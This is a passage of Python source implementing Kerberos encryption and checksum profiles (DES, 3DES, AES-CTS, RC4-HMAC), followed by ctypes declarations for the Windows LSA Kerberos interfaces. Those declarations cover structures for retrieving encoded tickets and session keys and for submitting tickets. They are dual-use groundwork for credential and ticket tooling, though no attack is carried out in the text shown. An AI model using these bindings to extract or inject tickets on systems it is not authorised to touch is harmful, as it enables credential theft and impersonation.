                temp56.append(byte & 0b01111111)
            if odd == False:
                # Every second block is bit-reversed before being folded in.
                bintemp = ""
                for byte in temp56:
                    bintemp += (bin(byte)[2:]).rjust(7, "0")
                bintemp = bintemp[::-1]
                temp56 = list()
                for bits7 in [bintemp[i : i + 7] for i in range(0, len(bintemp), 7)]:
                    temp56.append(int(bits7, 2))
            odd = not odd
            tempstring = XOR(tempstring, temp56)
        tempkey = bytes(addparity(tempstring))
        if _is_weak_des_key(tempkey):
            tempkey = tempkey[:7] + bytes([tempkey[7] ^ 0xF0])
        cipher = DES(tempkey, MODE_CBC, tempkey)
        checksum_key = cipher.encrypt(s)[-8:]
        checksum_key = fixparity(checksum_key)
        if _is_weak_des_key(checksum_key):
            checksum_key = checksum_key[:7] + bytes([checksum_key[7] ^ 0xF0])
        return Key(cls.enctype, checksum_key)

    @classmethod
    def basic_encrypt(cls, key, plaintext):
        """DES-CBC encrypt with an all-zero IV; input must be block-aligned."""
        assert len(plaintext) % 8 == 0
        des = DES(key.contents, MODE_CBC, b"\x00" * 8)
        return des.encrypt(plaintext)

    @classmethod
    def basic_decrypt(cls, key, ciphertext):
        """DES-CBC decrypt with an all-zero IV; input must be block-aligned."""
        assert len(ciphertext) % 8 == 0
        des = DES(key.contents, MODE_CBC, b"\x00" * 8)
        return des.decrypt(ciphertext)

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Derive a key from a password; ``params`` must be ``None`` or ``""``.

        Raises:
            ValueError: if ``params`` carries any other value.
        """
        if params is not None and params != "":
            raise ValueError("Invalid DES string-to-key parameters")
        key = cls.mit_des_string_to_key(string, salt)
        return key
class _DES3CBC(_SimplifiedEnctype):
    """Triple-DES CBC profile with SHA-1 HMAC (enctype ``DES3``)."""

    enctype = Enctype.DES3
    keysize = 24
    seedsize = 21
    blocksize = 8
    padsize = 8
    macsize = 20
    hashmod = SHA

    @classmethod
    def random_to_key(cls, seed):
        """Expand a 21-byte ``seed`` into a 24-byte key with parity bits.

        Raises:
            ValueError: if ``seed`` is not 21 bytes long.
        """

        def expand(seed):
            def parity(b):
                # Clear the low bit, then set it when that is needed to make
                # the number of set bits odd.
                b &= ~1
                return b if bin(b & ~1).count("1") % 2 else b | 1

            assert len(seed) == 7
            firstbytes = [parity(b & ~1) for b in seed]
            # The eighth byte collects the low bit of each of the seven
            # seed bytes (in bit positions 1..7).
            lastbyte = parity(sum((seed[i] & 1) << i + 1 for i in range(7)))
            keybytes = bytes(firstbytes + [lastbyte])
            if _is_weak_des_key(keybytes):
                # bytes are immutable: rebuild the key, do not assign into it.
                keybytes = keybytes[:7] + bytes([keybytes[7] ^ 0xF0])
            return keybytes

        if len(seed) != 21:
            raise ValueError("Wrong seed length")
        k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:])
        return Key(cls.enctype, k1 + k2 + k3)

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Derive a key from a password; ``params`` must be ``None`` or ``""``.

        Raises:
            ValueError: if ``params`` carries any other value.
        """
        if params is not None and params != "":
            raise ValueError("Invalid DES3 string-to-key parameters")
        k = cls.random_to_key(_nfold(string + salt, 21))
        return cls.derive(k, "kerberos".encode())

    @classmethod
    def basic_encrypt(cls, key, plaintext):
        """3DES-CBC encrypt with an all-zero IV; input must be block-aligned."""
        assert len(plaintext) % 8 == 0
        des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8)
        return des3.encrypt(plaintext)

    @classmethod
    def basic_decrypt(cls, key, ciphertext):
        """3DES-CBC decrypt with an all-zero IV; input must be block-aligned."""
        assert len(ciphertext) % 8 == 0
        des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8)
        return des3.decrypt(ciphertext)
class _AESEnctype(_SimplifiedEnctype):
    """Common AES profile: CBC with the last two blocks swapped and trimmed.

    Concrete subclasses set ``enctype``, ``keysize`` and ``seedsize``.
    """

    blocksize = 16
    padsize = 1
    macsize = 12
    hashmod = SHA

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Derive a key via PBKDF2.

        ``params`` is a 4-byte big-endian iteration count; when falsy,
        ``b"\\x00\\x00\\x10\\x00"`` (4096) is used.
        """
        (rounds,) = unpack(">L", params or b"\x00\x00\x10\x00")
        intermediate = cls.random_to_key(PBKDF2(string, salt, rounds, cls.seedsize))
        return cls.derive(intermediate, "kerberos".encode())

    @classmethod
    def basic_encrypt(cls, key, plaintext):
        """Encrypt at least 16 bytes; the output length equals the input length."""
        assert len(plaintext) >= 16
        cbc = AES(key.contents, MODE_CBC, b"\x00" * 16)
        ctext = cbc.encrypt(_zeropad(plaintext, 16))
        if len(plaintext) <= 16:
            return ctext
        # Swap the final two blocks and cut the (now last) block down to the
        # length of the original final partial block.
        tail_len = len(plaintext) % 16 or 16
        head = ctext[:-32]
        second_last = ctext[-32:-16]
        last = ctext[-16:]
        return head + last + second_last[:tail_len]

    @classmethod
    def basic_decrypt(cls, key, ciphertext):
        """Inverse of ``basic_encrypt``; needs at least 16 bytes of input."""
        assert len(ciphertext) >= 16
        ecb = AES(key.contents, MODE_ECB)
        if len(ciphertext) == 16:
            return ecb.decrypt(ciphertext)

        blocks = [ciphertext[off : off + 16] for off in range(0, len(ciphertext), 16)]
        tail_len = len(blocks[-1])

        # Ordinary CBC for everything but the last two blocks.
        chain = b"\x00" * 16
        recovered = b""
        for block in blocks[:-2]:
            recovered += _xorbytes(ecb.decrypt(block), chain)
            chain = block

        # The second-to-last block yields the final plaintext fragment plus
        # the bytes that were cut from the last ciphertext block.
        penultimate = ecb.decrypt(blocks[-2])
        final_fragment = _xorbytes(penultimate[:tail_len], blocks[-1])
        cut_bytes = penultimate[tail_len:]
        recovered += _xorbytes(ecb.decrypt(blocks[-1] + cut_bytes), chain)
        return recovered + final_fragment
class _AES128CTS(_AESEnctype):
    """AES profile with a 16-byte key and seed (enctype ``AES128``)."""

    enctype = Enctype.AES128
    keysize = seedsize = 16
class _AES256CTS(_AESEnctype):
    """AES profile with a 32-byte key and seed (enctype ``AES256``)."""

    enctype = Enctype.AES256
    keysize = seedsize = 32
class _RC4(_EnctypeProfile):
    """RC4-HMAC profile (enctype ``RC4``) built on HMAC-MD5."""

    enctype = Enctype.RC4
    keysize = 16
    seedsize = 16

    @staticmethod
    def usage_str(keyusage):
        """Pack the key usage as little-endian uint32, remapping 3 -> 8 and 23 -> 13."""
        remapped = {3: 8, 23: 13}
        return pack("<I", remapped.get(keyusage, keyusage))

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Return the MD4 of the UTF-16LE password; ``salt``/``params`` are unused."""
        password_utf16 = string.decode("UTF-8").encode("UTF-16LE")
        return Key(cls.enctype, md4(password_utf16).digest())

    @classmethod
    def encrypt(cls, key, keyusage, plaintext, confounder):
        """Return ``checksum || RC4(confounder || plaintext)``.

        An 8-byte random confounder is generated when ``confounder`` is ``None``.
        """
        if confounder is None:
            confounder = get_random_bytes(8)
        payload = confounder + plaintext
        ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
        cksum = HMAC.new(ki, payload, MD5).digest()
        ke = HMAC.new(ki, cksum, MD5).digest()
        return cksum + ARC4(ke).encrypt(payload)

    @classmethod
    def decrypt(cls, key, keyusage, ciphertext):
        """Decrypt and verify; returns the plaintext without the 8-byte confounder.

        Raises:
            ValueError: ciphertext shorter than 24 bytes.
            InvalidChecksum: the checksum does not verify.
        """
        if len(ciphertext) < 24:
            raise ValueError("ciphertext too short")
        cksum = ciphertext[:16]
        body = ciphertext[16:]
        ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
        ke = HMAC.new(ki, cksum, MD5).digest()
        basic_plaintext = ARC4(ke).decrypt(body)
        verified = _mac_equal(cksum, HMAC.new(ki, basic_plaintext, MD5).digest())
        if not verified and keyusage == 9:
            # For usage 9 the checksum is checked a second time with a key
            # derived from usage value 8.
            ki = HMAC.new(key.contents, pack("<I", 8), MD5).digest()
            verified = _mac_equal(cksum, HMAC.new(ki, basic_plaintext, MD5).digest())
        if not verified:
            raise InvalidChecksum("ciphertext integrity failure")
        return basic_plaintext[8:]

    @classmethod
    def prf(cls, key, string):
        """Return HMAC-SHA1 of ``string`` under the key contents."""
        return HMAC.new(key.contents, string, SHA).digest()
class _ChecksumProfile(object):
    """Base for checksum profiles; subclasses implement ``checksum``."""

    @classmethod
    def verify(cls, key, keyusage, text, cksum):
        """Recompute the checksum of ``text`` and compare it with ``cksum``.

        Raises:
            InvalidChecksum: if the two values differ.
        """
        if _mac_equal(cksum, cls.checksum(key, keyusage, text)):
            return
        raise InvalidChecksum("checksum verification failure")
class _SimplifiedChecksum(_ChecksumProfile):
    """Keyed checksum built from an encryption profile (``cls.enc``).

    Subclasses set ``enc`` and ``macsize``.
    """

    @classmethod
    def checksum(cls, key, keyusage, text):
        """Return the HMAC of ``text`` under a derived key, cut to ``macsize`` bytes."""
        derived = cls.enc.derive(key, pack(">IB", keyusage, 0x99))
        digest = HMAC.new(derived.contents, text, cls.enc.hashmod).digest()
        return digest[: cls.macsize]

    @classmethod
    def verify(cls, key, keyusage, text, cksum):
        """Verify ``cksum``; the key must match the profile's enctype.

        Raises:
            ValueError: ``key.enctype`` differs from ``cls.enc.enctype``.
            InvalidChecksum: the checksum does not match.
        """
        if key.enctype != cls.enc.enctype:
            raise ValueError("Wrong key type for checksum")
        super().verify(key, keyusage, text, cksum)
class _SHA1AES128(_SimplifiedChecksum):
    """12-byte checksum bound to the ``_AES128CTS`` profile."""

    enc = _AES128CTS
    macsize = 12
class _SHA1AES256(_SimplifiedChecksum):
    """12-byte checksum bound to the ``_AES256CTS`` profile."""

    enc = _AES256CTS
    macsize = 12
class _SHA1DES3(_SimplifiedChecksum):
    """20-byte checksum bound to the ``_DES3CBC`` profile."""

    enc = _DES3CBC
    macsize = 20
class _HMACMD5(_ChecksumProfile):
    """HMAC-MD5 checksum for RC4 keys."""

    @classmethod
    def checksum(cls, key, keyusage, text):
        """Return HMAC-MD5, under a signing key, of ``MD5(usage || text)``."""
        signing_key = HMAC.new(key.contents, b"signaturekey\x00", MD5).digest()
        inner_digest = MD5(_RC4.usage_str(keyusage) + text).digest()
        return HMAC.new(signing_key, inner_digest, MD5).digest()

    @classmethod
    def verify(cls, key, keyusage, text, cksum):
        """Verify ``cksum``; only RC4 keys are accepted.

        Raises:
            ValueError: ``key.enctype`` is not ``Enctype.RC4``.
            InvalidChecksum: the checksum does not match.
        """
        if key.enctype != Enctype.RC4:
            raise ValueError("Wrong key type for checksum")
        super().verify(key, keyusage, text, cksum)
# Maps an integer enctype identifier to the profile class implementing it.
# The annotation reflects the actual contents: the keys are the ints from
# ``Enctype`` and the values are classes (``_RC4`` is not a
# ``_SimplifiedEnctype``), so ``Dict[str, _SimplifiedEnctype]`` was wrong.
_enctype_table: Dict[int, type] = {
    Enctype.DES_MD5: _DESCBC,
    Enctype.DES3: _DES3CBC,
    Enctype.AES128: _AES128CTS,
    Enctype.AES256: _AES256CTS,
    Enctype.RC4: _RC4,
}
# Maps a checksum-type identifier to the profile class implementing it.
_checksum_table = {
    # Checksums bound to an encryption profile.
    Cksumtype.SHA1_DES3: _SHA1DES3,
    Cksumtype.SHA1_AES128: _SHA1AES128,
    Cksumtype.SHA1_AES256: _SHA1AES256,
    # HMAC-MD5 is reachable as -138 and as 0xFFFFFF76, the same value read
    # as an unsigned 32-bit integer.
    Cksumtype.HMAC_MD5: _HMACMD5,
    0xFFFFFF76: _HMACMD5,
}
def _get_enctype_profile(enctype):
    """Return the profile class registered for ``enctype``.

    Raises:
        ValueError: if ``enctype`` has no entry in ``_enctype_table``.
    """
    profile = _enctype_table.get(enctype)
    if profile is None:
        raise ValueError("Invalid enctype %d" % enctype)
    return profile
def _get_checksum_profile(cksumtype):
    """Return the profile class registered for ``cksumtype``.

    Raises:
        ValueError: if ``cksumtype`` has no entry in ``_checksum_table``.
    """
    profile = _checksum_table.get(cksumtype)
    if profile is None:
        raise ValueError("Invalid cksumtype %d" % cksumtype)
    return profile
class Key(object):
    """An encryption key: an enctype identifier plus the raw key bytes."""

    def __init__(self, enctype: Enctype, contents: bytes):
        """Store the key after checking its length against the profile.

        Raises:
            ValueError: unknown ``enctype`` (from ``_get_enctype_profile``) or
                ``contents`` not exactly the profile's ``keysize`` bytes.
        """
        expected_len = _get_enctype_profile(enctype).keysize
        if len(contents) != expected_len:
            raise ValueError("Wrong key length")
        self.enctype, self.contents = enctype, contents
# -- netsecapi.py ---------------------------------------------------- | |
# Windows-style names for the ctypes primitives used by the declarations below.

# Integers
BYTE = c_ubyte
SHORT = c_int16
USHORT = c_uint16
LONG = c_int32
ULONG = c_uint32
DWORD = c_uint32
LARGE_INTEGER = c_longlong
NTSTATUS = LONG

# Untyped pointers and handles
LPVOID = c_void_p
PVOID = LPVOID
HANDLE = LPVOID

# Characters and C strings
CHAR = c_char
SEC_CHAR = CHAR
LPSTR = c_char_p
PCHAR = LPSTR
PSEC_CHAR = PCHAR

# Typed pointers
LPBYTE = POINTER(BYTE)
PULONG = POINTER(ULONG)
PNTSTATUS = POINTER(NTSTATUS)
PHANDLE = POINTER(HANDLE)
LPHANDLE = PHANDLE

# Plain constants
ERROR_SUCCESS = 0
maxtoken_size = 2880
class SID:
    """A security identifier read from memory, printable as ``S-1-...``."""

    def __init__(self):
        self.Revision = None
        self.SubAuthorityCount = None
        self.IdentifierAuthority = None
        self.SubAuthority = []

    def __str__(self):
        authority = self.IdentifierAuthority
        if authority < 2**32:
            authority_text = str(authority)
        else:
            # Authorities of 2**32 and above are printed as 12 hex digits.
            authority_text = "0x" + authority.to_bytes(6, "big").hex().upper().rjust(
                12, "0"
            )
        sub_text = "".join("-" + str(sub) for sub in self.SubAuthority)
        return "S-1-" + authority_text + sub_text

    @staticmethod
    def from_ptr(ptr):
        """Read a SID from the integer address ``ptr``; ``None`` yields ``None``.

        The 8-byte header holds the revision (1 byte), the sub-authority
        count (1 byte) and the identifier authority (6 bytes, big-endian).
        It is followed by ``count`` little-endian 32-bit sub-authorities.
        """
        if ptr is None:
            return None

        header = string_at(ptr, 8)
        sid = SID()
        sid.Revision = header[0]
        sid.SubAuthorityCount = header[1]
        sid.IdentifierAuthority = int.from_bytes(header[2:8], "big", signed=False)

        body = string_at(ptr + 8, sid.SubAuthorityCount * 4)
        for offset in range(0, sid.SubAuthorityCount * 4, 4):
            sid.SubAuthority.append(
                int.from_bytes(body[offset : offset + 4], "little", signed=False)
            )
        return sid
class KERB_PROTOCOL_MESSAGE_TYPE(enum.Enum):
    """Message-type numbers placed in the ``MessageType`` field of Kerberos
    package requests; members are numbered consecutively from 0 to 31."""

    KerbDebugRequestMessage = 0
    KerbQueryTicketCacheMessage = 1
    KerbChangeMachinePasswordMessage = 2
    KerbVerifyPacMessage = 3
    KerbRetrieveTicketMessage = 4
    KerbUpdateAddressesMessage = 5
    KerbPurgeTicketCacheMessage = 6
    KerbChangePasswordMessage = 7
    KerbRetrieveEncodedTicketMessage = 8
    KerbDecryptDataMessage = 9
    KerbAddBindingCacheEntryMessage = 10
    KerbSetPasswordMessage = 11
    KerbSetPasswordExMessage = 12
    KerbVerifyCredentialsMessage = 13
    KerbQueryTicketCacheExMessage = 14
    KerbPurgeTicketCacheExMessage = 15
    KerbRefreshSmartcardCredentialsMessage = 16
    KerbAddExtraCredentialsMessage = 17
    KerbQuerySupplementalCredentialsMessage = 18
    KerbTransferCredentialsMessage = 19
    KerbQueryTicketCacheEx2Message = 20
    KerbSubmitTicketMessage = 21
    KerbAddExtraCredentialsExMessage = 22
    KerbQueryKdcProxyCacheMessage = 23
    KerbPurgeKdcProxyCacheMessage = 24
    KerbQueryTicketCacheEx3Message = 25
    KerbCleanupMachinePkinitCredsMessage = 26
    KerbAddBindingCacheEntryExMessage = 27
    KerbQueryBindingCacheMessage = 28
    KerbPurgeBindingCacheMessage = 29
    KerbQueryDomainExtendedPoliciesMessage = 30
    KerbQueryS4U2ProxyCacheMessage = 31
class SEC_E(enum.Enum):
    """Named security status codes, keyed by their unsigned 32-bit value."""

    # Success / continuation codes.
    OK = 0x00000000
    CONTINUE_NEEDED = 0x00090312

    # Error codes (high bit set).
    INSUFFICIENT_MEMORY = 0x80090300
    INVALID_HANDLE = 0x80090301
    UNSUPPORTED_FUNCTION = 0x80090302
    TARGET_UNKNOWN = 0x80090303
    INTERNAL_ERROR = 0x80090304
    SECPKG_NOT_FOUND = 0x80090305
    NOT_OWNER = 0x80090306
    CANNOT_INSTALL = 0x80090307
    INVALID_TOKEN = 0x80090308
    CANNOT_PACK = 0x80090309
    QOP_NOT_SUPPORTED = 0x8009030A
    NO_IMPERSONATION = 0x8009030B
    LOGON_DENIED = 0x8009030C
    UNKNOWN_CREDENTIALS = 0x8009030D
    NO_CREDENTIALS = 0x8009030E
    MESSAGE_ALTERED = 0x8009030F
    OUT_OF_SEQUENCE = 0x80090310
    NO_AUTHENTICATING_AUTHORITY = 0x80090311
    BAD_PKGID = 0x80090316
    CONTEXT_EXPIRED = 0x80090317
    INCOMPLETE_MESSAGE = 0x80090318
    INCOMPLETE_CREDENTIALS = 0x80090320
    BUFFER_TOO_SMALL = 0x80090321
    WRONG_PRINCIPAL = 0x80090322
    TIME_SKEW = 0x80090324
    UNTRUSTED_ROOT = 0x80090325
    ILLEGAL_MESSAGE = 0x80090326
    CERT_UNKNOWN = 0x80090327
    CERT_EXPIRED = 0x80090328
    ENCRYPT_FAILURE = 0x80090329
    DECRYPT_FAILURE = 0x80090330
    ALGORITHM_MISMATCH = 0x80090331
    SECURITY_QOS_FAILED = 0x80090332
    UNFINISHED_CONTEXT_DELETED = 0x80090333
    NO_TGT_REPLY = 0x80090334
    NO_IP_ADDRESSES = 0x80090335
    WRONG_CREDENTIAL_HANDLE = 0x80090336
    CRYPTO_SYSTEM_INVALID = 0x80090337
    MAX_REFERRALS_EXCEEDED = 0x80090338
    MUST_BE_KDC = 0x80090339
    STRONG_CRYPTO_NOT_SUPPORTED = 0x8009033A
    TOO_MANY_PRINCIPALS = 0x8009033B
    NO_PA_DATA = 0x8009033C
    PKINIT_NAME_MISMATCH = 0x8009033D
    SMARTCARD_LOGON_REQUIRED = 0x8009033E
    SHUTDOWN_IN_PROGRESS = 0x8009033F
    KDC_INVALID_REQUEST = 0x80090340
    KDC_UNABLE_TO_REFER = 0x80090341
    KDC_UNKNOWN_ETYPE = 0x80090342
    UNSUPPORTED_PREAUTH = 0x80090343
    DELEGATION_REQUIRED = 0x80090345
    BAD_BINDINGS = 0x80090346
    MULTIPLE_ACCOUNTS = 0x80090347
    NO_KERB_KEY = 0x80090348
    CERT_WRONG_USAGE = 0x80090349
    DOWNGRADE_DETECTED = 0x80090350
    SMARTCARD_CERT_REVOKED = 0x80090351
    ISSUING_CA_UNTRUSTED = 0x80090352
    REVOCATION_OFFLINE_C = 0x80090353
    PKINIT_CLIENT_FAILURE = 0x80090354
    SMARTCARD_CERT_EXPIRED = 0x80090355
    NO_S4U_PROT_SUPPORT = 0x80090356
    CROSSREALM_DELEGATION_FAILURE = 0x80090357
    REVOCATION_OFFLINE_KDC = 0x80090358
    ISSUING_CA_UNTRUSTED_KDC = 0x80090359
    KDC_CERT_EXPIRED = 0x8009035A
    KDC_CERT_REVOKED = 0x8009035B
    INVALID_PARAMETER = 0x8009035D
    DELEGATION_POLICY = 0x8009035E
    POLICY_NLTM_ONLY = 0x8009035F

    # Further non-error codes (decimal 590625, 590612 and 590611).
    RENEGOTIATE = 0x00090321
    COMPLETE_AND_CONTINUE = 0x00090314
    COMPLETE_NEEDED = 0x00090313
class SECPKG_CRED(enum.IntFlag):
    """Credential-use flags; ``BOTH`` equals ``INBOUND | OUTBOUND``."""

    AUTOLOGON_RESTRICTED = 0x10
    BOTH = 0x3
    INBOUND = 0x1
    OUTBOUND = 0x2
    PROCESS_POLICY_ONLY = 0x20
class ISC_REQ(enum.IntFlag):
    """Bit flags passed to (and reported back by) ``InitializeSecurityContext``.

    Each member occupies a single bit, written here as a shift.
    """

    DELEGATE = 1 << 0
    MUTUAL_AUTH = 1 << 1
    REPLAY_DETECT = 1 << 2
    SEQUENCE_DETECT = 1 << 3
    CONFIDENTIALITY = 1 << 4
    USE_SESSION_KEY = 1 << 5
    PROMPT_FOR_CREDS = 1 << 6
    USE_SUPPLIED_CREDS = 1 << 7
    ALLOCATE_MEMORY = 1 << 8
    USE_DCE_STYLE = 1 << 9
    DATAGRAM = 1 << 10
    CONNECTION = 1 << 11
    CALL_LEVEL = 1 << 12
    FRAGMENT_SUPPLIED = 1 << 13
    EXTENDED_ERROR = 1 << 14
    STREAM = 1 << 15
    INTEGRITY = 1 << 16
    IDENTIFY = 1 << 17
    NULL_SESSION = 1 << 18
    MANUAL_CRED_VALIDATION = 1 << 19
    RESERVED1 = 1 << 20
    FRAGMENT_TO_FIT = 1 << 21
    HTTP = 1 << 28
class SECPKG_ATTR(enum.Enum):
    """Attribute selectors; ``QueryContextAttributes`` passes ``.value``
    of one of these as its attribute argument."""

    SESSION_KEY = 9
    C_ACCESS_TOKEN = 0x80000012
    C_FULL_ACCESS_TOKEN = 0x80000082
    CERT_TRUST_STATUS = 0x80000084
    CREDS = 0x80000080
    CREDS_2 = 0x80000086
    NEGOTIATION_PACKAGE = 0x80000081
    PACKAGE_INFO = 10
    SERVER_AUTH_FLAGS = 0x80000083
    SIZES = 0
    SUBJECT_SECURITY_ATTRIBUTES = 124
    ENDPOINT_BINDINGS = 26
class SECBUFFER_TYPE(enum.Enum):
    """Values stored in ``SecBuffer.BufferType`` to label a buffer's content."""

    SECBUFFER_ALERT = 17
    SECBUFFER_ATTRMASK = 0xF0000000  # decimal 4026531840
    SECBUFFER_CHANNEL_BINDINGS = 14
    SECBUFFER_CHANGE_PASS_RESPONSE = 15
    SECBUFFER_DATA = 1
    SECBUFFER_DTLS_MTU = 24
    SECBUFFER_EMPTY = 0
    SECBUFFER_EXTRA = 5
    SECBUFFER_MECHLIST = 11
    SECBUFFER_MECHLIST_SIGNATURE = 12
    SECBUFFER_MISSING = 4
    SECBUFFER_PKG_PARAMS = 3
    SECBUFFER_PRESHARED_KEY = 22
    SECBUFFER_PRESHARED_KEY_IDENTITY = 23
    SECBUFFER_SRTP_MASTER_KEY_IDENTIFIER = 20
    SECBUFFER_SRTP_PROTECTION_PROFILES = 19
    SECBUFFER_STREAM_HEADER = 7
    SECBUFFER_STREAM_TRAILER = 6
    SECBUFFER_TARGET = 13
    SECBUFFER_TARGET_HOST = 16
    SECBUFFER_TOKEN = 2
    SECBUFFER_TOKEN_BINDING = 21
    SECBUFFER_APPLICATION_PROTOCOLS = 18
    SECBUFFER_PADDING = 9
class FILETIME(Structure):
    """Two 32-bit words (low, then high) making up one timestamp value."""

    _fields_ = [("dwLowDateTime", DWORD), ("dwHighDateTime", DWORD)]


# Pointer type plus the alternative names used by the security API wrappers.
PFILETIME = POINTER(FILETIME)
TimeStamp = FILETIME
PTimeStamp = PFILETIME
class SecPkgContext_SessionKey(Structure):
    """Length-prefixed pointer to session-key bytes."""

    _fields_ = [
        ("SessionKeyLength", ULONG),
        ("SessionKey", LPBYTE),
    ]

    @property
    def Buffer(self):
        """Copy ``SessionKeyLength`` bytes out of ``SessionKey`` as ``bytes``."""
        key_ptr = self.SessionKey
        return string_at(key_ptr, size=self.SessionKeyLength)
class SecHandle(Structure):
    """Pair of pointer-sized slots used as an opaque handle."""

    _fields_ = [
        ("dwLower", POINTER(ULONG)),
        ("dwUpper", POINTER(ULONG)),
    ]

    def __init__(self):
        # Each slot starts out pointing at its own freshly allocated zero ULONG.
        lower = pointer(ULONG())
        upper = pointer(ULONG())
        super(SecHandle, self).__init__(lower, upper)
class SecBuffer(Structure):
    """One typed byte buffer: size, type tag and data pointer."""

    _fields_ = [
        ("cbBuffer", ULONG),
        ("BufferType", ULONG),
        ("pvBuffer", PVOID),
    ]

    def __init__(
        self, token=b"\x00" * maxtoken_size, buffer_type=SECBUFFER_TYPE.SECBUFFER_TOKEN
    ):
        """Allocate a buffer holding ``token`` and point the structure at it.

        By default this is ``maxtoken_size`` zero bytes tagged as a token
        buffer, i.e. empty space for an API call to fill.
        """
        backing = create_string_buffer(token, size=len(token))
        data_ptr = cast(byref(backing), PVOID)
        Structure.__init__(self, sizeof(backing), buffer_type.value, data_ptr)

    @property
    def Buffer(self):
        """Return ``(SECBUFFER_TYPE, bytes)`` for the current contents."""
        kind = SECBUFFER_TYPE(self.BufferType)
        payload = string_at(self.pvBuffer, size=self.cbBuffer)
        return (kind, payload)
class SecBufferDesc(Structure):
    """Descriptor for an array of :class:`SecBuffer` entries."""

    _fields_ = [
        ("ulVersion", ULONG),
        ("cBuffers", ULONG),
        ("pBuffers", POINTER(SecBuffer)),
    ]

    def __init__(self, secbuffers=None):
        """Wrap ``secbuffers``; with no argument, hold one default ``SecBuffer``."""
        if secbuffers is None:
            Structure.__init__(self, 0, 1, pointer(SecBuffer()))
            return
        count = len(secbuffers)
        packed = (SecBuffer * count)(*secbuffers)
        Structure.__init__(self, 0, count, packed)

    def __getitem__(self, index):
        """Return the ``SecBuffer`` at position ``index``."""
        return self.pBuffers[index]

    @property
    def Buffers(self):
        """List of each entry's ``Buffer`` value, in order."""
        return [self.pBuffers[pos].Buffer for pos in range(self.cBuffers)]
# Pointer types for the descriptor and the generic handle.
PSecBufferDesc = POINTER(SecBufferDesc)
PSecHandle = POINTER(SecHandle)

# Credential and context handles are both plain SecHandle structures.
CredHandle = SecHandle
CtxtHandle = SecHandle
PCredHandle = PSecHandle
PCtxtHandle = PSecHandle
class LUID(Structure):
    """64-bit identifier stored as an unsigned low word and a signed high word."""

    _fields_ = [("LowPart", DWORD), ("HighPart", LONG)]

    def to_int(self):
        """Return this identifier as a single Python integer."""
        return LUID.luid_to_int(self)

    @staticmethod
    def luid_to_int(luid):
        """Combine ``luid.HighPart`` and ``luid.LowPart`` into one integer."""
        high_bits = luid.HighPart << 32
        return high_bits + luid.LowPart

    @staticmethod
    def from_int(i):
        """Build a ``LUID`` from integer ``i`` (upper bits high, lower 32 low)."""
        result = LUID()
        result.HighPart = i >> 32
        result.LowPart = i & 0xFFFFFFFF
        return result


PLUID = POINTER(LUID)
class LSA_STRING(Structure):
    """Counted 8-bit string: used length, allocated length, data pointer."""

    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", POINTER(c_char)),
    ]

    def to_string(self):
        """Decode the string's contents to ``str``.

        Only the first ``Length`` bytes are read. ``MaximumLength`` is the
        allocation size, so reading that many bytes would also return the
        NUL terminator and any unused slack after the real text.
        """
        if not self.Buffer or not self.Length:
            return ""
        return string_at(self.Buffer, self.Length).decode()


PLSA_STRING = POINTER(LSA_STRING)
class LSA_UNICODE_STRING(Structure):
    """Counted UTF-16-LE string; both lengths are byte counts."""

    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", POINTER(c_char)),
    ]

    @staticmethod
    def from_string(s):
        """Build a structure owning a NUL-terminated UTF-16-LE copy of ``s``.

        ``Length`` excludes the two-byte terminator; ``MaximumLength`` is the
        real allocation size, so it never points past the buffer and is
        always an even number of bytes.
        """
        encoded = s.encode("utf-16-le")
        terminated = encoded + b"\x00\x00"
        lus = LSA_UNICODE_STRING()
        lus.Buffer = create_string_buffer(terminated, len(terminated))
        lus.MaximumLength = len(terminated)
        lus.Length = len(encoded)
        return lus

    def to_string(self):
        """Decode the string's contents to ``str``.

        Reads ``Length`` bytes rather than ``MaximumLength``: the latter may
        cover a terminator or slack, and an odd byte count cannot be decoded
        as UTF-16 at all. Any NUL characters are removed from the result.
        """
        if not self.Buffer or not self.Length:
            return ""
        raw = string_at(self.Buffer, self.Length)
        return raw.decode("utf-16-le").replace("\x00", "")
class KERB_CRYPTO_KEY(Structure):
    """Key descriptor: type number, byte length and pointer to the key bytes."""

    _fields_ = [("KeyType", LONG), ("Length", ULONG), ("Value", PVOID)]

    def to_dict(self):
        """Return ``{"KeyType": int, "Key": bytes}`` with the key bytes copied."""
        key_type = self.KeyType
        key_bytes = string_at(self.Value, self.Length)
        return {"KeyType": key_type, "Key": key_bytes}
class KERB_EXTERNAL_TICKET(Structure):
    """Ticket record: names, session key, flags, times and the encoded ticket."""

    _fields_ = [
        # Name pointers, kept opaque here.
        ("ServiceName", PVOID),
        ("TargetName", PVOID),
        ("ClientName", PVOID),
        ("DomainName", LSA_UNICODE_STRING),
        ("TargetDomainName", LSA_UNICODE_STRING),
        ("AltTargetDomainName", LSA_UNICODE_STRING),
        ("SessionKey", KERB_CRYPTO_KEY),
        ("TicketFlags", ULONG),
        ("Flags", ULONG),
        # 64-bit time values.
        ("KeyExpirationTime", LARGE_INTEGER),
        ("StartTime", LARGE_INTEGER),
        ("EndTime", LARGE_INTEGER),
        ("RenewUntil", LARGE_INTEGER),
        ("TimeSkew", LARGE_INTEGER),
        # Encoded ticket bytes: length followed by pointer.
        ("EncodedTicketSize", ULONG),
        ("EncodedTicket", PVOID),
    ]

    def get_data(self):
        """Return ``{"Key": <session key dict>, "Ticket": <encoded bytes>}``.

        Both entries are copied out of the memory the structure points to.
        """
        session_key = self.SessionKey.to_dict()
        encoded = string_at(self.EncodedTicket, self.EncodedTicketSize)
        return {"Key": session_key, "Ticket": encoded}
class KERB_SUBMIT_TKT_REQUEST(Structure):
    """Fixed-size header of a ticket-submission request."""

    _fields_ = [
        ("MessageType", DWORD),
        ("LogonId", LUID),
        ("TicketFlags", ULONG),
        ("Key", KERB_CRYPTO_KEY),
        ("KerbCredSize", ULONG),
        ("KerbCredOffset", ULONG),
    ]


# Size in bytes of the header above; sizeof() gives the same result for the
# class as for an instance.
